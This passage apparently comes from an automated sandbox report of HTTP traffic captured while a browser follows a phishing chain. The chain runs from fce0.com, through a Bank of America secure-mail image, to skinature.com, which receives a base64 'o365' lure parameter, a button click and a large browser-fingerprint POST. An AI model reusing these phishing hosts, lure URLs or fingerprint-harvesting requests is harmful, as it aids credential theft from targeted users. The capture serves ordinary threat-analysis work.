                                                                    2024-10-28 13:02:28 UTC1940INData Raw: 37 38 64 0d 0a 47 49 46 38 39 61 5a 00 44 00 f7 00 00 00 00 00 53 53 53 54 54 54 55 55 55 56 56 56 57 57 57 58 58 58 59 59 59 5a 5a 5a 5b 5b 5b 5c 5c 5c 5d 5d 5d 5e 5e 5e 5f 5f 5f 60 60 60 61 61 61 62 62 62 63 63 63 65 65 65 66 66 66 67 67 67 68 68 68 69 69 69 6a 6a 6a 6b 6b 6b 6d 6d 6d 6e 6e 6e 6f 6f 6f 71 71 71 72 72 72 73 73 73 74 74 74 75 75 75 76 76 76 77 77 77 78 78 78 79 79 79 7a 7a 7a 7b 7b 7b 7c 7c 7c 7e 7e 7e 80 80 80 82 82 82 84 84 84 85 85 85 86 86 86 87 87 87 88 88 88 89 89 89 8a 8a 8a 8b 8b 8b 8c 8c 8c 8d 8d 8d 8e 8e 8e 8f 8f 8f 90 90 90 91 91 91 92 92 92 93 93 93 94 94 94 95 95 95 96 96 96 97 97 97 99 99 99 9a 9a 9a 9b 9b 9b 9c 9c 9c 9d 9d 9d 9e 9e 9e 9f 9f 9f a0 a0 a0 a1 a1 a1 a3 a3 a3 a4 a4 a4 a5 a5 a5 a6 a6 a6 a7 a7 a7 a8 a8 a8 a9 a9 a9
                                                                    Data Ascii: 78dGIF89aZDSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbccceeefffggghhhiiijjjkkkmmmnnnoooqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||~~~
                                                                    2024-10-28 13:02:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449736199.188.200.2314431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:28 UTC764OUTGET /favicon.ico HTTP/1.1
                                                                    Host: fce0.com
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: image
                                                                    Referer: https://fce0.com/vn%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:02:28 UTC301INHTTP/1.1 404 Not Found
                                                                    keep-alive: timeout=5, max=100
                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                    pragma: no-cache
                                                                    content-type: text/html
                                                                    content-length: 1251
                                                                    date: Mon, 28 Oct 2024 13:02:28 GMT
                                                                    server: LiteSpeed
                                                                    x-turbo-charged-by: LiteSpeed
                                                                    connection: close
                                                                    2024-10-28 13:02:28 UTC1251INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449741184.28.90.27443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:29 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-10-28 13:02:29 UTC467INHTTP/1.1 200 OK
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (lpl/EF06)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-weu-z1
                                                                    Cache-Control: public, max-age=172339
                                                                    Date: Mon, 28 Oct 2024 13:02:29 GMT
                                                                    Connection: close
                                                                    X-CID: 2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.449742148.163.158.1074431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:29 UTC402OUTGET /securereader/Image?c=lock&b=1&rnd=0.00823190732671009 HTTP/1.1
                                                                    Host: secmail.bankofamerica.com
                                                                    Connection: keep-alive
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: */*
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: cors
                                                                    Sec-Fetch-Dest: empty
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:02:29 UTC525INHTTP/1.1 200 200
                                                                    Date: Mon, 28 Oct 2024 13:02:29 GMT
                                                                    Server:
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                    Cache-Control: max-age=2592000
                                                                    Expires: Wed, 27 Nov 2024 13:02:29 GMT
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-XSS-Protection: 1; mode=block
                                                                    X-Content-Type-Options: nosniff
                                                                    Expect-CT: max-age=86400, enforce
                                                                    Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'; object-src 'self'
                                                                    X-UA-Compatible: IE=edge
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: image/gif
                                                                    2024-10-28 13:02:29 UTC1940INData Raw: 37 38 64 0d 0a 47 49 46 38 39 61 5a 00 44 00 f7 00 00 00 00 00 53 53 53 54 54 54 55 55 55 56 56 56 57 57 57 58 58 58 59 59 59 5a 5a 5a 5b 5b 5b 5c 5c 5c 5d 5d 5d 5e 5e 5e 5f 5f 5f 60 60 60 61 61 61 62 62 62 63 63 63 65 65 65 66 66 66 67 67 67 68 68 68 69 69 69 6a 6a 6a 6b 6b 6b 6d 6d 6d 6e 6e 6e 6f 6f 6f 71 71 71 72 72 72 73 73 73 74 74 74 75 75 75 76 76 76 77 77 77 78 78 78 79 79 79 7a 7a 7a 7b 7b 7b 7c 7c 7c 7e 7e 7e 80 80 80 82 82 82 84 84 84 85 85 85 86 86 86 87 87 87 88 88 88 89 89 89 8a 8a 8a 8b 8b 8b 8c 8c 8c 8d 8d 8d 8e 8e 8e 8f 8f 8f 90 90 90 91 91 91 92 92 92 93 93 93 94 94 94 95 95 95 96 96 96 97 97 97 99 99 99 9a 9a 9a 9b 9b 9b 9c 9c 9c 9d 9d 9d 9e 9e 9e 9f 9f 9f a0 a0 a0 a1 a1 a1 a3 a3 a3 a4 a4 a4 a5 a5 a5 a6 a6 a6 a7 a7 a7 a8 a8 a8 a9 a9 a9
                                                                    Data Ascii: 78dGIF89aZDSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbccceeefffggghhhiiijjjkkkmmmnnnoooqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||~~~
                                                                    2024-10-28 13:02:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.449743184.28.90.27443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:02:30 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept: */*
                                                                    Accept-Encoding: identity
                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                    Range: bytes=0-2147483646
                                                                    User-Agent: Microsoft BITS/7.8
                                                                    Host: fs.microsoft.com
                                                                    2024-10-28 13:02:30 UTC515INHTTP/1.1 200 OK
                                                                    ApiVersion: Distribute 1.1
                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                    Content-Type: application/octet-stream
                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                    Server: ECAcc (lpl/EF06)
                                                                    X-CID: 11
                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                    X-Ms-Region: prod-weu-z1
                                                                    Cache-Control: public, max-age=172392
                                                                    Date: Mon, 28 Oct 2024 13:02:30 GMT
                                                                    Content-Length: 55
                                                                    Connection: close
                                                                    X-CID: 2
                                                                    2024-10-28 13:02:30 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.44975150.87.179.2404431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:16 UTC893OUTPOST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1
                                                                    Host: skinature.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 48
                                                                    Cache-Control: max-age=0
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    Origin: https://fce0.com
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    Referer: https://fce0.com/
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:16 UTC48OUTData Raw: 73 75 62 6d 69 74 42 75 74 74 6f 6e 73 3d 2b 2b 2b 2b 43 6c 69 63 6b 2b 68 65 72 65 2b 74 6f 2b 72 65 61 64 2b 6d 65 73 73 61 67 65 2b 2b 2b 2b
                                                                    Data Ascii: submitButtons=++++Click+here+to+read+message++++
                                                                    2024-10-28 13:03:17 UTC251INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:16 GMT
                                                                    Server: Apache
                                                                    Upgrade: h2,h2c
                                                                    Connection: Upgrade, close
                                                                    Vary: Accept-Encoding
                                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                    Transfer-Encoding: chunked
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    2024-10-28 13:03:17 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                                                    Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.44975250.87.179.2404431704C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:17 UTC969OUTPOST /o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N HTTP/1.1
                                                                    Host: skinature.com
                                                                    Connection: keep-alive
                                                                    Content-Length: 139017
                                                                    Cache-Control: max-age=0
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    Origin: https://skinature.com
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: same-origin
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: document
                                                                    Referer: https://skinature.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPVdEVkZhekE9JnVpZD1VU0VSMTYxMDIwMjRVMTExMDE2NDc=N0123N
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 64 61 74 61 3d 25 37 42 25 32 32 73 63 72 65 65 6e 25 32 32 25 33 41 25 37 42 25 32 32 61 76 61 69 6c 57 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 61 76 61 69 6c 48 65 69 67 68 74 25 32 32 25 33 41 39 38 34 25 32 43 25 32 32 77 69 64 74 68 25 32 32 25 33 41 31 32 38 30 25 32 43 25 32 32 68 65 69 67 68 74 25 32 32 25 33 41 31 30 32 34 25 32 43 25 32 32 63 6f 6c 6f 72 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 70 69 78 65 6c 44 65 70 74 68 25 32 32 25 33 41 32 34 25 32 43 25 32 32 61 76 61 69 6c 4c 65 66 74 25 32 32 25 33 41 30 25 32 43 25 32 32 61 76 61 69 6c 54 6f 70 25 32 32 25 33 41 30 25 32 43 25 32 32 6f 72 69 65 6e 74 61 74 69 6f 6e 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 53 63 72 65 65 6e 4f 72 69 65
                                                                    Data Ascii: data=%7B%22screen%22%3A%7B%22availWidth%22%3A1280%2C%22availHeight%22%3A984%2C%22width%22%3A1280%2C%22height%22%3A1024%2C%22colorDepth%22%3A24%2C%22pixelDepth%22%3A24%2C%22availLeft%22%3A0%2C%22availTop%22%3A0%2C%22orientation%22%3A%22%5Bobject+ScreenOrie
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 58 4d 4c 44 6f 63 75 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 57 72 69 74 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 57 72 69 74 61 62 6c 65 53 74 72 65 61 6d 44 65 66 61 75 6c 74 43 6f 6e 74 72 6f 6c 6c
                                                                    Data Ascii: %22function+XMLDocument%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultWriter%22%3A%22function+WritableStreamDefaultWriter%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22WritableStreamDefaultController%22%3A%22function+WritableStreamDefaultControll
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 32 66 75 6e 63 74 69 6f 6e 2b 53 56 47 41 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 70 6f 6e 73 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 70 6f 6e 73 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 53 69 7a 65 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 52 65 73 69 7a 65 4f 62 73 65 72 76 65 72 45 6e 74 72 79 25 32 32 25
                                                                    Data Ascii: 2function+SVGAElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22Response%22%3A%22function+Response%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverSize%22%3A%22function+ResizeObserverSize%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22ResizeObserverEntry%22%
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 6e 75 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 65 64 69 61 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 48 54 4d 4c 4d 61 72 71 75 65 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 48
                                                                    Data Ascii: %22function+HTMLMenuElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMediaElement%22%3A%22function+HTMLMediaElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22HTMLMarqueeElement%22%3A%22function+HTMLMarqueeElement%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22H
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 6e 61 6c 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 6f 66 66 73 63 72 65 65 6e 42 75 66 66 65 72 69 6e 67 25 32 32 25 33 41 74 72 75 65 25 32 43 25 32 32 57 65 62 41 73 73 65 6d 62 6c 79 25 32 32 25 33 41 25 32 32 25 35 42 6f 62 6a 65 63 74 2b 57 65 62 41 73 73 65 6d 62 6c 79 25 35 44 25 32 32 25 32 43 25 32 32 41 62 73 6f 6c 75 74 65 4f 72 69 65 6e 74 61 74 69 6f 6e 53 65 6e 73 6f 72 25 32 32 25 33 41 25 32 32 66
                                                                    Data Ascii: nal%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22AbortController%22%3A%22function+AbortController%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22offscreenBuffering%22%3Atrue%2C%22WebAssembly%22%3A%22%5Bobject+WebAssembly%5D%22%2C%22AbsoluteOrientationSensor%22%3A%22f
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 73 66 65 72 50 61 63 6b 65 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 49 73 6f 63 68 72 6f 6e 6f 75 73 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 55 53 42 4f 75 74 54 72 61 6e 73 66 65 72 52 65 73 75 6c 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65
                                                                    Data Ascii: sferPacket%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBIsochronousOutTransferResult%22%3A%22function+USBIsochronousOutTransferResult%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22USBOutTransferResult%22%3A%22function+USBOutTransferResult%28%29+%7B+%5Bnative+code
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 74 72 65 61 6d 41 75 64 69 6f 44 65 73 74 69 6e 61 74 69 6f 6e 4e 6f 64 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 74 72 65 61 6d 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 48 61 6e 64 6c 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 53 6f 75 72 63 65 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 52 65 63 6f 72 64 65 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 51 75 65 72 79 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 4c 69 73 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 72 72 6f 72 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6e 63 72 79 70 74 65 64 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 4d 65 64 69 61 45 6c 65 6d 65 6e 74 41 75 64 69 6f
                                                                    Data Ascii: treamAudioDestinationNode%22%2C%22MediaStream%22%2C%22MediaSourceHandle%22%2C%22MediaSource%22%2C%22MediaRecorder%22%2C%22MediaQueryListEvent%22%2C%22MediaQueryList%22%2C%22MediaList%22%2C%22MediaError%22%2C%22MediaEncryptedEvent%22%2C%22MediaElementAudio
                                                                    2024-10-28 13:03:17 UTC16384OUTData Raw: 61 74 65 63 68 61 6e 67 65 25 32 32 25 32 43 25 32 32 6f 6e 73 63 72 6f 6c 6c 65 6e 64 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 50 6c 61 79 62 61 63 6b 45 76 65 6e 74 25 32 32 25 32 43 25 32 32 41 6e 69 6d 61 74 69 6f 6e 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 43 53 53 41 6e 69 6d 61 74 69 6f 6e 25 32 32 25 32 43 25 32 32 43 53 53 54 72 61 6e 73 69 74 69 6f 6e 25 32 32 25 32 43 25 32 32 44 6f 63 75 6d 65 6e 74 54 69 6d 65 6c 69 6e 65 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 4d 61 6e 61 67 65 72 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 63 6f 72 64 25 32 32 25 32 43 25 32 32 42 61 63 6b 67 72 6f 75 6e 64 46 65 74 63 68 52 65 67 69 73 74 72 61 74 69 6f 6e 25 32 32 25
                                                                    Data Ascii: atechange%22%2C%22onscrollend%22%2C%22AnimationPlaybackEvent%22%2C%22AnimationTimeline%22%2C%22CSSAnimation%22%2C%22CSSTransition%22%2C%22DocumentTimeline%22%2C%22BackgroundFetchManager%22%2C%22BackgroundFetchRecord%22%2C%22BackgroundFetchRegistration%22%
                                                                    2024-10-28 13:03:17 UTC7945OUTData Raw: 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25 32 43 25 32 32 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 32 25 33 41 25 32 32 66 75 6e 63 74 69 6f 6e 2b 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 25 32 38 25 32 39 2b 25 37 42 2b 25 35 42 6e 61 74 69 76 65 2b 63 6f 64 65 25 35 44 2b 25 37 44 25 32 32 25
                                                                    Data Ascii: %22%3A%22function+createComment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createDocumentFragment%22%3A%22function+createDocumentFragment%28%29+%7B+%5Bnative+code%5D+%7D%22%2C%22createElement%22%3A%22function+createElement%28%29+%7B+%5Bnative+code%5D+%7D%22%
                                                                    2024-10-28 13:03:18 UTC251INHTTP/1.1 200 OK
